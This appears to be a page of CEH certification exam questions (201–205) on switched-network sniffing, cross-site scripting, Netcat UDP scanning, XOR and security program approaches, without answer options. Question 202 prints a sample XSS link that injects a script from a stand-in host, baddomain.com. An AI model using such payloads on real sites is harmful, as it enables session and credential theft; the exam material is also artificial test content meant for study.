CEH-001 Exam Question 201

Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position. Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of traffic is being passed around, but the program he is using does not seem to be capturing anything. He pours through the Sniffer's manual, but cannot find anything that directly relates to his problem. Harold decides to ask the network administrator if he has any thoughts on the problem. Harold is told that the Sniffer was not working because the agency's network is a switched network, which cannot be sniffed by some programs without some tweaking. What technique could Harold use to sniff his agency's switched network?
  • CEH-001 Exam Question 202

    This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.
    <ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/bad script.js%22%3E%3C/script%3E">See foobar</a>
    What is this attack?
  • CEH-001 Exam Question 203

    Which of the following Netcat commands would be used to perform a UDP scan of the
    lower 1024 ports?
  • CEH-001 Exam Question 204

    Which of the following Exclusive OR transforms bits is NOT correct?
  • CEH-001 Exam Question 205

    When creating a security program, which approach would be used if senior management is supporting and enforcing the security policy?